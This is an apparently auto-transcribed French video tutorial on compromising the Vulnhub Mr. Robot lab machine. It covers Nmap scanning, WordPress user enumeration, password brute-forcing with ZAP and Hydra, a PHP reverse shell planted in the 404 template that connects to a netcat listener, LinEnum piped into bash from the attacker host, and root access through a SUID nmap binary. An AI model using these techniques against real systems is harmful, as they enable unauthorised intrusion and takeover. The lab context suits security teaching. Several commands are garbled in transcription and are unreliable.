Bonjour et bienvenue sur ma chaîne. Aujourd'hui, je te propose de voir comment router la machine vulnérable Mr. Robot de Vulnhub. En guise d'introduction, nous allons voir quelques généralités sur la machine. Il s'agit d'une machine relativement facile qui est disponible sur la plateforme Vulnhub. Les technologies utilisées dans cette machine sont Apache, WordPress, PHP et Linux. Les outils utilisés dans cette vidéo vont être Nmap pour la reconnaissance, WPScan pour sonder l'état du WordPress et trouver d'éventuelles vulnérabilités, Zap Proxy pour intercepter et modifier les requêtes entre notre navigateur et le site vulnérable, mais aussi pour FUDZ. Hydra pour FUDZ le formulaire de connexion au panneau d'administration du WordPress, et finalement LinEnum pour réaliser la post-exploitation de la box. La toute première étape va être de lancer un scan rapide des ports de la box pour voir les ports qui sont ouverts et les services qui y sont associés. Donc, le premier scan va correspondre à un scan dit rapide. Pour cela, on ouvre un terminal en tant que route et on tape nmap-t4-script est égal default-sv-p-192.168.10.2. Voilà. Avec-t4 qui permet de régler la rapidité du scan pour un réseau local. Euh, tu dois savoir qu'il existe d'autres niveaux de réglage de la rapidité du scan, qui sont T0 et T1, qui eux vont correspondre à des scans furtifs qui ne sont normalement pas détectés par des IDS. T2, qui lui, est un scan ralenti qui utilise très peu de bandes passantes. Il est intéressant pour des réseaux justement à faible bande passante. Tiré T3, qui lui, va correspondre à un mode normal. C'est le scan par défaut quand on ne spécifie pas d'option et T5, c'est le scan le plus rapide, mais aussi le moins fiable. Ensuite, on a "-script", on va le voir après, mais à ce stade, on peut déjà dire que cela va permettre de lancer des scripts dès que Note sera détectée. Ensuite, on a "-sv", cette option va permettre d'identifier le service et la version du service en utilisant différents tests. Ces tests vont pouvoir être regroupés en intensité paramétrable à l'aide de plusieurs options. Ces options vont être «— version light », un éditeur de texte, donc je disais «— version light », où là, euh, euh, nmap va tester va faire tous les tests les plus probables avec une identification rapide, «— version all », où là, tous les tests vont être exécutés un à un, et «— version trace », qui va afficher des informations de débugage. Par exemple, on peut très bien lancer nmap-s-v-version-light-version-trace-192.168.10.2. Voilà. Et là, on voit effectivement qu'on a des informations de débugage qui s'affichent. Donc la dernière option, "-p-", va permettre de tester tous les ports de 1 à 65534. Le deuxième scan, lui, va correspondre à un scan plus complexe, qui va potentiellement nous ramener plus d'informations, mais qui sera plus lent. Alors, pour le lancer, encore une fois, on ouvre un terminal. Là, je vais ouvrir un autre terminal. Et on tape nmap t 4 endmap-t4-script-safe-intrusive-open-sv-granto ». "-p-"192.168.10.2 Quelques explications sur les options utilisées. Le tiret tiret "-open-" permet de n'afficher que les ports ouverts. Le grand O permet de détecter le système d'exploitation. Le tiret tiret "-script-" égal permet de lancer les scripts NSE donc qui sont écrits avec le langage Lua. Il faut savoir que du coup, les valeurs acceptées par cette option vont pouvoir, prendre, vont pouvoir être pardon, de différentes natures. Cela pourrait être le nom d'un ou plusieurs scripts, séparés par des virgules, le nom d'un ou plusieurs dossiers, ou le nom d'une ou plusieurs catégories. Dans notre cas, il s'agit des catégories « safe » et « intrusive ». Aussi dans la doc, il parle de catégories, mais le contenu du fichier « script.db » présentant dans « usr-share-nmap-script » montre qu'il s'agit plus de tags que de catégories. Alors, pourquoi il s'agit plus de tags que de catégories Car un script peut être associé à plusieurs catégories, ce qui sous-entend que les catégories ne sont pas forcément exclusives, d'où la notion de tag, à mon sens, plus que de catégorie. et même si, dans notre cas, les catégories safe et intrusive que qu'on utilise ici, sont-elles naturellement ex mutuellement pardon exclusives. On ne peut pas avoir un script qui appartient à la fois à safe et à intrusive. Alors, tu dois aussi savoir qu'il existe plusieurs autres catégories, autres que Safe et Intrusive, qui sont par exemple vuln ou Discovery. Ici, par exemple, voilà, on a Discovery. Et si on navigue un peu, on devrait également trouver des vulnes. Alors, revenons au résultat de notre premier scan. On voit que les ports 80 et 443 sont ouverts. Voilà, et que le site Apache est associé à ces deux ports. Explorons maintenant le site web rapidement. Pour cela, on va ouvrir un navigateur et on se rend sur l'URL de la box http 192.168.10.2. On constate qu'il s'agit d'un site plutôt bien fait, qui manifestement simule un Linux. Alors, à ce stade... Il vaut mieux éviter hein, de tomber dans le piège, de jouer avec le site, car nous sommes plutôt dans une phase de collecte d'informations. Et s'il le faut, on interagira plus avant avec le site, plus tard dans le process. Et pour terminer, donc, on voit qu'on peut saisir différentes commandes. Lançons un troisième scan qui va correspondre à l'énumération HTTP avec un script particulier de Nmap qui est le script NSE. Alors, ayant trouvé un Apache, essayons d'explorer automatiquement son contenu. Donc, Pour cela, comme je le disais, on va utiliser Nmap et un script qui est le script HTTP enum. Donc pour cela, on ouvre encore notre autre terminable et on tape Nmap-T4-Script égale HTTP-Enum-192.168.10.2-P80. 443. Alors, en attendant le résultat du scan, passons à l'analyse manuelle du site en recherchant des fichiers de métadonnées classiques. Donc, on revient sur notre navigateur et on cherche, par exemple, le fichier robots.txt. Donc là, le fichier robots.txt nous indique qu'il y a deux autres fichiers, fsocity.dic et Okay, euh, one of three .txt. On va ouvrir le fsocity.dic. Pour cela, on tape fsocity.dic. Donc le point .dic indique qu'il s'agit potentiellement d'un dictionnaire. Hein, et qui dit dictionnaire, dit brute force. Aussi, comme on peut le voir, il s'agit d'un fichier, fichier pardon, relativement volumineux pour un dictionnaire. Donc il fait quasiment 7 mégas. On va le télécharger et on va lire son contenu. On va le re pardon. Donc si on ouvre son contenu, on voit qu'il s'agit bien d'un fichier qui comporte des mots isolés sur chaque ligne. Du fait de son volume, on va essayer de réduire sa taille. Pour cela, on va d'abord compter le nombre de lignes actuelles du fichier. WC-LFSoCity.dic et on s'aperçoit qu'il y a 858 160 lignes. Ensuite, on supprime les doublons en triant, puis en enlevant les éventuels doublons. Donc Pour ça, on fait un sort, fSoCity.dic, pipe unique, pipe wc-l. On constate que nous étions bien en présence de doublons, car le nombre de lignes est passé de 858 000 à 11 451. Donc ce qu'on va faire, c'est que maintenant on va stocker donc, le résultat de ce tri et de ce filtre dans un fichier qu'on va appeler on va mettre dans devshm qu'on va appeler password.txt Le deuxième fichier qui est ici correspond à notre première clé sachant qu'il s'agit d'une un, machine orientée ctf donc, où l'idée c'est de récupérer des flags, bon, autrement dit des clés. Maintenant, revenons au script HTTP enum de NMAP. Le voici. On voit que le script NSE a renvoyé des fichiers de métadonnées intéressants. Donc, tout d'abord, on a la présence du robots.txt, mais ça, donc, on vient de l'examiner. On voit également qu'on a la présence de répertoires slash admin, qui sont potentiellement intéressants. On a la présence de répertoires qui laisse penser qu'un WordPress est installé, tous les WP-includes. WP, on a un répertoire slash 0 qui est un répertoire relativement intéressant et on a un readme.html. Donc voyons maintenant le fichier readme.html dans un premier temps. Donc une page s'affiche. Ça semble être une impasse. On parle aussi de Rabbit Hole en anglais qui nous dit « J'aime bien où tu mets ta tête, cependant je ne compte pas t'aider. » Analysons maintenant le contenu en lien avec le WordPress. Donc, On va se rendre sur le wp-admin. Donc Là, j'avais créé un lien. Voilà, On accède à un formulaire de connexion ou l'interface d'administration du WordPress. On va essayer admin-admin. Ça ne marche pas. Or, on sait qu'on a un dictionnaire à exploiter. Mais il va falloir nous trouver un moyen de savoir si un login existe ou pas. Pourquoi Car sans cela, même si on utilise un dictionnaire, on aura environ 11 000 utilisateurs multipliés par 11 000 mots de passe, ce qui va nous donner environ 120 millions de possibilités à brute forcer, ce qui est quasiment impossible, en tout cas avec la machine que nous possédons. Analysons maintenant activement le WordPress. Alors, étant donné la présence du WordPress, on va lancer un scan automatique avec WPSCAN. Pour cela, on ouvre un terminal et on tape... Voilà, donc je passe route et on tape WPSCAN-URL HTTP 192168102 slash-enumerate vp. Le u, c'est pour Utilisateur, EVP, c'est pour Vulnerable Plugin. Autrement dit, on va chercher à énumérer les utilisateurs et les plugins vulnérables. On lance la commande. A priori, il n'y a pas de vulnérabilité directement exploitable, car habituellement, elle s'affiche directement en rouge. Il n'y a pas non plus de plugin détecté, donc c'est ce qu'on voit ici. Et il n'y a pas non plus d'utilisateur valide. Ça, c'est plus problématique, car comme on l'a vu, sans utilisateur, il va nous falloir tester environ 120 millions de possibilités pour ne pas venir à nous connecter à l'interface d'administration du WordPress. Pourtant, il y a forcément au moins un utilisateur valide. Donc on va essayer maintenant d'énumérer manuellement les utilisateurs, étant donné que l'énumération automatique semble ne pas fonctionner. Alors pour énumérer les articles rédigés par un contributeur, on utilise en général un pattern du genre. URL, donc au niveau du WordPress, slash point d'interrogation autor égale 1. Donc on va le tester. Ok, donc là, on voit que c'est comme si on n'avait rien mis. C'est pareil. On voit que quand on teste, on est toujours redirigé vers la même page. Bon, si on revient au résultat du script http et enum, qui doit être là Il est où voilà le voici on voit qu'on avait notamment le répertoire slash 0 qui est manifestement qui est potentiellement intéressant on va donc essayer d'explorer le contenu de ce répertoire slash 0 slash Okay. Et là, on voit qu'on tombe sur une page d'article plus classique dans WordPress. Si maintenant, on essaie de détecter manuellement la version en utilisant justement le pattern « slash 0 » supplémentaire, « auteur égale 0 okay. », donc il ne se passe rien de particulier, « auteur égale 1 », là, on voit que des choses se passent. Donc on a changé le de message d'erreur, « auteur 3 », donc on a une réaction là où tout à l'heure, qu'on mette « 0, 1, 2, 3, 4 ou 5 », avait tout le temps la même page. Et là, c'est pareil sur Autor 5, on constate que ça change. De plus, avec Autor 5, on voit qu'ici, il écrit Christa Gordon, et avec Autor 6, Elliot Anderson. Ce qui laisse sous-entendre qu'on a la possibilité quand même d'énumérer des utilisateurs. Alors, essayons maintenant de relancer un WPScan en changeant l'URL de, de base et en le suffixant avec slash 0. Je reviens là-dessus. Cette fois-ci, je reprends mon ancienne commande, je rajoute « slash 0 » et je la lance. Euh... Donc là, il nous dit qu'il ne veut pas car il faut lui fournir le « –wp-content-dir ». C'est ce que je vais faire. -wp -dir « –wp-content-dir » égale « slash ». Et là, on s'aperçoit que ça a fonctionné et qu'il nous a trouvé bien deux utilisateurs. Alors, passons maintenant au brute forcing du panneau d'administration du WordPress. Donc, on va utiliser pour cela deux techniques. Une première avec l'outil open source ZapProxy et une deuxième en ligne de commande avec l'outil Hydra, qui est également un outil open source. Alors, la première méthode avec ZapProxy. Donc, tu dois savoir que Zap est le principal concurrent open source de Burp Suite. Dans un premier temps, pour l'utiliser... On fait exactement comme avec Burp Suite, on utilise des proxys HTTP. Donc pour cela, on ouvre notre navigateur et on, sera dans la sec on se rend dans la section réseau proxy HTTP. Donc on va dans paramètres, paramètres du réseau, voilà, et ici on a la possibilité de spécifier un proxy. Donc on saisit 127.0.0.1, bon, là c'était déjà saisi, on spécifie le port 8080, -80 et surtout on coche. Utiliser également ce proxy pour HTTPS. On fait OK. Maintenant, on va lancer Zap. Alors, pour lancer Zap, on utilise la commande zapproxy. Il yeah. y a un P. OK. Une fois lancé, ce qu'on va faire, c'est qu'on va mettre un point d'arrêt en appuyant sur le bouton vert. On se rend de nouveau sur la page de connexion du panneau d'administration. Et on va saisir des données fake, admin, admin, par exemple. Voilà. Admin. Admin. Donc, on peut voir que le système ne répond plus. Si on se rend maintenant sur l'outil Zap, qui est ici, on peut voir qu'il a intercepté la requête. La voici. Et au passage, donc, on peut voir effectivement qu'il s'agit d'une requête POST. Donc, maintenant, si on souhaite brute forcer, on va faire un clic droit, générer du bruit. Donc une fenêtre s'affiche, à partir de laquelle on va pouvoir paramétrer le fuzzer. Donc on va modifier le paramètre log en ajoutant un fuzzer de type string sur ce paramètre. Donc là, on lui met les deux utilisateurs qu'on avait trouvés, donc qui sont Elliot et Mich Mish05654, ajouter, OK. On va modifier le deuxième paramètre PWD en ajoutant un fuzzer de type fichier sur ce paramètre. On fait ajouter, ajouter, fichier, sélectionner. On va sélectionner donc notre fichier password.txt. Ah mince, tout à l'heure je l'avais supprimé. Donc il faut que je le refasse rapidement. Donc je vais le refaire rapidement. Hop, je vais dans téléchargement. Voilà, donc je vais faire sort society unique supérieur à euh, non, même pas. Je crois que je l'avais non, il est là. Pas le point txt, autant pour moi. Dev SHM, ajouter, ok. Et là, on démarre le fuzzer, de trop, et on peut démarrer le fuzzer. On peut déjà constater que la plupart des réponses ont des tailles identiques, 3643 octets environ, et des codes de réponse également identiques. Alors, il s'agit de la réponse indiquant que le mot de passe est incorrect. Étant donné que le contenu de la page affichée en réponse est toujours le même, la taille de cette réponse sera du coup toujours la même. Ce qui sous-entend donc qu'il faut s'attendre à ce que le bon mot de passe change la taille et ou le code de la réponse. Donc on attend que le fudger termine. On peut déjà essayer de trier par taille. Pour l'instant, il n'a rien trouvé. Ah, là, il semble nous avoir trouvé quelque chose avec le mot de passe ER28-0652. Je reviens ici. Je tape. Elliot, ER28-0652. ER28-0650. Très bien. Bon, on va le laisser terminer. Voir s'il si nous trouve d'autres choses intéressantes. Donc pendant ce temps, ce qu'on va faire, c'est qu'on va essayer de brute forcer avec Hydra. Le temps qu'il continue. Donc on va faire la même chose, uniquement en ligne de commande en utilisant Hydra. Ou attendez, non, plutôt avant de faire ça, on va tout simplement essayer les identifiants qu'on a trouvés directement sur le wordpress donc là ici on avait dit elliot et après on avait dit er 0650 voilà on clique sur login je continue on dit que ça marche pas elliot er on a dit 28 0 er 0652 Super, on revient donc sur euh, la page de WP Admin, et on voit bien qu'on tombe sur l'interface d'administration. Ce qui est parfait, alors, est-ce qu'il nous a trouvé un autre Super, donc il nous en a trouvé un autre aussi, qui est dylan underscore 2791. Bon, on le garde sous le coude, au cas où on en a besoin. Donc maintenant, on va essayer de faire la même chose avec Hydra. Donc on va d'abord créer un fichier « user.txt ». Je reviens ici. On va le mettre dans « devshm ». Là, on va lister donc, les utilisateurs. « mich 0.56.54 ». Le fichier est créé. Ensuite, on va lancer Hydra en utilisant justement ces deux fichiers, « users.txt » que je viens de créer et « password.txt ». Donc avant ça, on va copier-coller la requête « post » qu'on récupère depuis « zap ». Si je vais dans l'historique, l'historique voilà, elle est là. Donc on récupère la requête post ici. Super. Donc maintenant on va taper hydra-grand L devshmuserstxt p slash dev shm, -shm password.txt 192.168.10.2 http-post. Forme cette fois-ci, donc on va se servir de slash wp login qui est ici. Voilà deux points log égale user et pwd égale et wp submit est égal. Voilà, ça me paraît bon. ok. Donc j'oublie autre chose, et ici il faut un incorrect. Alors pourquoi cet incorrect Car il va s'agir de la chaîne de caractères qui va indiquer à Hydra euh, que tant que cette chaîne finalement est présente dans la réponse, nous n'avons pas trouvé un bon mot de passe. C'est-à-dire que dès qu'une réponse ne va pas contenir incorrect, Hydra va partir du principe qu'il a trouvé un mot de passe valide. Alors la syntaxe hydra rapidement le grand L slash dev slash shm slash user c'est le fichier justement qui contient les utilisateurs et donc chaque utilisateur vont être passé ici au niveau de ce paramètre car ici on a un user en majuscule et donc qui est avec avant et après Justement, un petit chapeau. Un -grand -p slash dev slash shm slash password qui lui va correspondre à notre fichier dictionnaire. Et pareil, chaque élément du fichier dictionnaire va être passé au paramètre password grâce ici au pass. L'ip, donc qui est ici. Et http post -postform qui correspond au module qu'Hydra va utiliser justement pour faire une requête http de type post. Donc, en attendant que Hydra termine, avançons dans le processus et essayons maintenant d'exploiter la page d'administration du WordPress. Alors, grâce à l'interface d'administration, on va pouvoir installer un payload qui nous permettra de lancer un reverse shell qui, à son tour, nous permettra de lancer des commandes à distance depuis notre propre terminal. Alors, voyons tout d'abord quelques rappels sur ce qu'est un reverse shell. Donc, un reverse shell va permettre de déployer un shell à l'intérieur d'une machine en l'occurrence la machine de la victime, qui sera contrôlée à partir d'une autre machine distante, celle de l'attaquant par exemple, c'est-à-dire la nôtre. Après avoir partiellement piraté la victime, l'attaquant va trouver un moyen de déposer un programme qu'on appelle un payload capable de déclencher un shell sur la machine de la victime. Alors, voici un schéma rapide qui récapitule comment fonctionne un reverse shell. Alors, tout d'abord, on a la machine de l'attaquant, qui est la nôtre. Ensuite, on voit la machine de la victime. Donc, dans notre cas, il s'agira de la box Mr. Robot. Alors, après avoir installé le payload qui est ici, donc, au niveau du WordPress, et lancé le listener qui est ici, donc sur notre propre machine, le processus va se dérouler en trois étapes. Donc, dans une première étape, l'attaquant va envoyer une requête particulière pour déclencher le payload. Dans une deuxième étape, le payload va déployer un shell sur la machine de la victime. Et dans une dernière étape, le payload va relier les entrées et les sorties du shell de la victime à un terminal contrôlé par l'attaquant pour lui permettre de lancer des commandes depuis sa machine. Alors, voyons maintenant l'upload du reverse shell sur la machine victime à partir du WordPress. Alors, L'étape préalable au déploiement du reverse shell est de pouvoir disposer d'un moyen de déposer notre payload. Donc pour cela, on va choisir le template de la page 404 que l'on va modifier pour accueillir notre, pay notre payload. Donc Pour cela, on revient sur notre interface d'administration WordPress. On va dans Apparence Editor. On choisit 404 template sur la colonne de droite. Ensuite, il va nous falloir écrire le code PHP qui va déployer notre web shell. Le plus simple. C'est de s'appuyer sur les scripts existants de Kali Linux. Donc pour cela, on va dans usr/share/webshell/php. On choisit, donc on liste, on choisit le script php reverse shell.php et on va co copier son contenu dans le presse-papier. Donc pour faire ça, on fait tout simplement xclip selection clipboard. Voilà, Donc là, normalement, le contenu est copié. On vient ensuite copier, coller le script en début du script PHP du template 404 de WordPress. Voilà. Donc pour faire bien, on va supprimer ça. Une fois copié, on va adapter le code du payload pour lui dire où et comment se connecter au terminal distant de l'attaquant. Donc pour cela, on va changer les paramètres suivants IP qui correspond à l'IP de l'attaquant. Donc nous, en l'occurrence, c'est 192.168.10.4. Le port, qui correspond au port du listener de l'attaquant. Dans notre cas, netcat, comme on, on va le voir après. Et comme aussi, on le voyait sur le schéma qui est ici. Donc le netcat, il est à ce niveau-là. Et une fois, donc, ce qu'on va mettre, c'est qu'on va mettre... 4444 pour être consistant avec le schéma et on va sauvegarder. Maintenant, ce qu'on va faire, on va déployer un listener sur notre machine. Alors une fois que l'attaquant aura déclenché le payload, ce listener va recevoir une connexion du shell de la victime. C'est ce que je vous montrais tout à l'heure. Alors pour déployer le listener, on va ouvrir un terminal. On va prendre un terminal existant et on va saisir NC-LVNP 4444. Voilà, très bien. Alors, avant de continuer, on va aller voir si Hydra a terminé. Est-ce que Hydra nous a trouvé... Voilà. Et donc, là ici, comme on peut le voir, hein, juste une petite parenthèse, on voit que Hydra nous a aussi trouvé le login, deux logins et deux bons mots de passe. Donc, ceux qu'on avait déjà trouvé avec Zap. Voilà. Super. Alors, passons maintenant au déclenchement du payload. Donc, on est d'accord qu'il ne nous reste plus qu'à déclencher le payload en nous rendant sur une page inconnue, afin que le WordPress serve la page correspondante à une erreur 404. Donc, pour faire ça, on va ouvrir un navigateur et on va taper n'importe quoi. On s'aperçoit alors que le listener Netcat a reçu un prompt, normalement. Voilà, ce qui sous-entend, donc ici on a bien un dollar, on a bien un prompt, ce qui sous-entend qu'il est prêt à recevoir des commandes. Alors on va tester le fonctionnement de ce prompt avec la commande IP, ADDR, et on constate effectivement que l'IP de la machine est bien 192.10.2, et donc qu'on pilote bien un shell sur la machine de la victime depuis notre propre machine. Alors, on va jouer un peu avec le shell, et là, on voit qu'on ne peut pas. Pourquoi on ne peut pas En tout cas, on a des messages d'erreur un peu curieux. C'est parce qu'on est face à un shell qui n'est pas associé à un terminal. Typiquement, si j'essaye de faire un slash etc slash password, le système nous dit « Error opening terminal unknown ». Pour remédier à ce problème, il existe plusieurs techniques. Nous allons en utiliser une qui repose sur le langage Python. Donc assurons-nous d'abord que python est bien installé. Pour cela, on saisit which python et on constate effectivement que python est bien installé dans le répertoire usr Bean python 3 On peut désormais donc améliorer l'interactivité du shell en tapant python -c import pty; pty. /bin/bash voilà. Et on a, du coup, un prompt plus classique avec un bash. Si on fait un env, on a toutes les variables d'environnement classiques d'un bash. Maintenant, on va, ensuite de réduire le on va essayer de réduire le saut de ligne inutile quand on appuie sur entrée. car Comme on voit, à chaque fois, donc on a un saut de ligne inutile. Alors pour faire ça, on fait CTRL Z. Donc On revient dans notre terminal à nous. On fait un stty row moins écho point virgule fg on appuie deux fois sur entrée et là on voit qu'on a évacué, éliminé donc le truc supplémentaire et si on fait un LS tabulation on voit qu'on a même la suggestion des, de, de l'autocomplétion qui est activée. Donc on va définir ensuite le type de terminal de manière à ce qu'il soit identique donc à celui de ma machine. Pourquoi Parce que si on essaye encore de faire un nano, on s'aperçoit qu'on a toujours le même problème. Donc, pour savoir quel est le terminal de ma machine, je fais un echo dollar $TERM, ok. Et là, je vais essayer de faire un export TERM= xterm-256color, 256 ok. Et si maintenant je réessaye de faire un nano, on voit que nano fonctionne. Par contre, il réagit bizarrement. Alors on va essayer, donc on quitte. On va du coup essayer d'améliorer là le problème qu'on a avec Nano. Alors pour faire ça, c'est pareil, donc, on va faire un CTRL Z. Alors, encore mieux, on va passer dans un autre terminal. Voilà, on va faire un ST. Donc ça c'est un autre terminal chez nous. On fait un stty size. Et ici on a 56. Lignes sur, non, pardon, on a 56 colonnes sur 136 lignes, ou l'inverse. 56 lignes sur 136 colonnes. Donc on revient sur notre terminal on tape stt cols 136, et rows, on avait dit 56. Ok, on réessaye nano, et là on voit que nano s'affiche correctement, tout est bien positionné en bas. Passons maintenant à la post-exploitation. Alors, maintenant qu'on peut lancer interactivement des commandes, il faut trouver un moyen d'élever nos privilèges. Pour ça, on va s'appuyer sur un script de post-exploitation qui va réaliser automatiquement une empreinte du système et détecter ainsi des faiblesses, voire des vulnérabilités éventuelles. Alors, Recherchons des faiblesses éventuelles potentielles avec linenum. Tout d'abord, essayons d'installer Alors, C'est un script qui est disponible sur GitHub. Pour le trouver, il suffit juste de faire dans Google, donc j'ouvre un terminal, pas fermé. Voilà. donc j'ouvre un terminal, je fais site de point github.com et ici je tape lin et nu. Alors ça c'est normal car j'ai toujours mon proxy qui est activé, c'est-à-dire que voilà, je réessaye, donc là ça marche, et je prends celui-ci de reboot user. Donc on récupère l'URL du git, et on va cloner ensuite en récupérant, en ne récupérant pas l'historique git du projet. C'est inutile. Hein donc pour faire ça, on fait un git clone-death-1-https, et là on colle ce qu'on avait trouvé. Ok, donc on regarde si le répertoire linénium a bien été créé, ce qui est bien le cas. Alors, lançons maintenant l'inénum à distance. Alors, maintenant que l'inénum est sur notre poste, il nous faut trouver un moyen de le lancer à distance. Pour cela, on va avoir plusieurs options. Soit on télécharge l'inénum depuis la machine victime en l'exposant au travers d'un site HTTP déployé sur notre machine. Cette approche va nécessiter du coup plusieurs prérequis. Donc, tout d'abord, il va falloir qu'un programme de téléchargement WGET soit disponible sur la box. Donc, si je reviens donc ici est ce qu'on a wget c'est bon ensuite il faut que l'utilisateur donc démon là en l'occurrence ait les droits d'écriture sur un répertoire donc slash tmp donc pour faire ça on fait touch slash tmp slash toto donc on voit qu'on a le droit donc ça c'est déjà un deuxième prérequis qui est rempli et pour terminer il faut un dernier prérequis qui correspond au répertoire euh, il faut que le répertoire, justement, avec les droits d'écriture, donc là par exemple slash tmp, ne soit pas monté avec l'option de montage noexec. Alors pour savoir, juste on fait un mount et on regarde grep noexec. Et donc qu'est-ce qu'on voit On voit qu'on qu a un slash run qui est avec noexec, un sysfs, un devfs, mais. Visiblement, le « slash TMP », lui, n'a pas de noexec, donc on devrait être capable finalement de télécharger l'inenum sur « slash TMP » et l'exécuter. Bon, ça c'est la première option. Maintenant, on va voir une deuxième option, où là, on va faire directement exécuter l'inenum en établissant un pipe entre un bash de la machine victime et un netcat de notre machine qui va servir le script « linenum » à distance. Voilà. Donc nous, ça, c'est la deuxième option que l'on va retenir. Pourquoi Parce que finalement, c'est elle qui va nécessiter le moins de prérequis, même si on a vu que pour la première option, tous les prérequis sont quand même là. Hein. Alors, comment on va s'y prendre Tout d'abord, on va saisir dans un de nos terminaux, donc pas celui-ci, hein, c'est-à-dire pas le chef de la box. Donc là, j'ouvre un nouveau terminal chez moi, et on va saisir, par exemple, nc lvnp 5444 inférieur linénum linenum.sh. Voilà. Donc là qu'est-ce qu'on voit On voit que je suis allé récupérer finalement le linenum.sh. Donc ça qu'est-ce que ça va permettre Ça va permettre d'envoyer tout le contenu justement de linenum.sh au travers de la première connexion qui va se faire sur le port 5444 de notre machine. Donc ensuite, sur le terminal distant ici, on va saisir nc 192.168.10.4, 5444, et ça, on va mettre un pipe, et on va mettre un bash. Voilà, et donc ça, qu'est-ce que ça a fait Ça a permis justement de nous connecter à la machine de l'attaquant depuis la box, et dès que cette connexion a été établie, on voit que le contenu de l'unénum est envoyé par notre machine, il est bien reçu par la box et puis il est directement redirigé vers un programme Bash qui, comme on est en train de le voir, est en train justement d'interpréter l'Inénium et donc de l'exécuter par Bash. Donc voyons maintenant les résultats que nous renvoie l'Inenum. Donc on va revenir au début. Bon, c'est pas très grave. Euh, c'est pas très grave, mais c'est quand même dommage. Okay, bon. Moi, en général, ce que j'aime voir, c'est s'il y a des sudo ou des suid. Donc, on voit ici qu'on est sur une vieille version de sudo. Donc, on a le script wget qui est installé. Ça, on l'avait déjà constaté. Et ça, c'est intéressant. Ici, on va avoir des fichiers qui ont le bit setuid. Et dans ces fichiers, on a un usr local bin, c'est-à-dire, finalement, un exécutable qui est un peu particulier, qui visiblement a été exécuté manuellement a été installé pardon, manuellement. C'est-à-dire que habituellement quand on passe par des euh, systèmes de packaging natifs, donc, comme par exemple APT ou, ou d'autres, euh, les exécutables sont installés dans USR BIN. Là, du moment qu'on est sur du USR Local BIN, ça laisse sous-entendre que un, un programme a été compilé manuellement et que l'exécutable résultant a été installé dans USR Local BIN NMAP. OK, donc on ne va pas aller plus loin. Ce qu'on va faire maintenant, c'est qu'on va essayer d'élever nos privilèges. Alors, parmi les premières choses que l'on fait pour essayer d'élever nos privilèges, tout d'abord, il y a le listing des autorisations sudo de l'utilisateur actuel. Donc, là, on va aller ici. Là, il nous dit qu'il a fini. Donc, si je fais un sudo -l, je vois que je n'ai rien. Donc, ça, ça laisse sous-entendre qu que l'utilisateur démon n'a aucun droit sudo. Maintenant, ce qu'on va faire, c'est qu'on va essayer d'exploiter des failles de processus qui ont le bit SUID. Alors, donc on l'a vu, hein, le Nmap a justement le bit SUID. Mais avant ça, on va rappeler, on va donner quelques rappels sur le bit SUID. Alors, un processus qui a un bit SUID va être capable, s'il crée à son tour d'autres processus, en lançant une sous-shell par exemple, de faire exécuter ses scripts enfants avec les droits de son propriétaire. Alors qu'est-ce que ça sous-entend Ça sous-entend que si le propriétaire est root et qu'on parvient à faire exécuter n'importe quelle commande au travers de cet exécutable, alors on sera capable d'exécuter n'importe quelle commande en tant que root. Voilà. Donc nous ce qu'on va faire, on va, comme je le disais, essayer d'exploiter le suid de nmap. Alors, regardons d'abord la version de Nmap. Donc, on est là, on fait un Nmap-version. Il ne le trouve pas, on a dit qu'il était... OK, on est sur une version 3.8.1, alors qu'aujourd'hui, les versions de Nmap sont plutôt des versions 7.92. Donc, on est sur une version assez ancienne de Nmap. Donc, il faut que tu saches que les anciennes versions de Nmap avait un mode dit interactif qui permettait justement de lancer des commandes shell. Donc pour cela, il suffit juste d'utiliser l'option ⁇ -interactive ⁇ Donc c'est ce qu'on va faire. Voilà. Et maintenant, pour lancer un shell, on a juste à faire un point d'exclamation ⁇ sh ⁇ Et on a bien un prompt. Alors pour voir maintenant les permissions de l'utilisateur de notre nouveau shell, on va taper ⁇ id ⁇ et on s'aperçoit effectivement que notre EUID, qui est ici, il est égal à 0. Autrement dit, que le bit SUID correspond bien, justement, au. Euh, enfin, pardon, que le, que le bit SUID est bien présent. Et donc, que l'utilisateur là a un EUID qui correspond au propriétaire du processus parent, c'est-à-dire le root. Alors. Donc, pour terminer, ce qu'on va essayer de faire, c'est qu'on va essayer de lancer un shell avec un EID à 0. Alors, donc en gros, il va falloir trouver un moyen de transformer notre droit EID égale 0 en UID égale 0. Alors, pour ça, il existe différentes techniques qui sont possibles, mais nous, nous allons en retenir une qui est, encore une fois, basée sur Python. Alors, on va lancer toujours ici un processus Python 3. Donc dans l'interpréteur, on va faire un import OS. On vérifie bien que le processus Python a bien hérité des droits du shell parent. Donc comment on fait On fait OS.getUID. Donc là, on est bien sûr du 1. Mais là où ça devient plus intéressant, c'est si on fait un getEUID. Et là, on devrait être à 0. Alors, getUID, ça nous donne bien 1. Voilà, ce qui correspond effectivement au user démon Et... GetEUID, on a bien 0, ce qui correspond au user route. On va maintenant définir un nouveau EUID avec la méthode setREUID de OS. Donc pour faire ça, c'est très simple. OS.setREUID, entre parenthèses, 0,0. On va tester maintenant les nouveaux droits. OS.getEUID. Et là, on voit qu'on est. Pardon. OS.getID. Et là, on voit qu'on est bien 0, c'est-à-dire que finalement, Python est devenu root. Donc, qu'est-ce qu'il nous reste à faire Il ne nous reste plus qu'à lancer un shell avec le user Python. Donc, pour ça, on a plusieurs manières de faire. Soit on passe par ce qu'on avait fait tout à l'heure, pty.spawn. Euh, pty, voilà. Soit autrement, on passe par un os.command. Donc, nous, c'est ce qu'on va faire. Slash bin, slash bash -p ah, pardon ça doit être os.execute euh, non plus os.system os /bash -p super donc là pour s'assurer que le bash déployé est bien chez l'administrateur on fait juste id mais là c'est plutôt bon signe parce qu'ici on voit en route voilà et on voit qu'on est bien route alors, c'en est fini pour ce tutoriel. Bon, Bien qu'un peu long, j'espère que je ne t'ai pas fait perdre ton temps et surtout que tu as appris des choses intéressantes. Quant à moi, je n'ai plus qu'à te dire à bientôt pour une nouvelle vidéo. Salut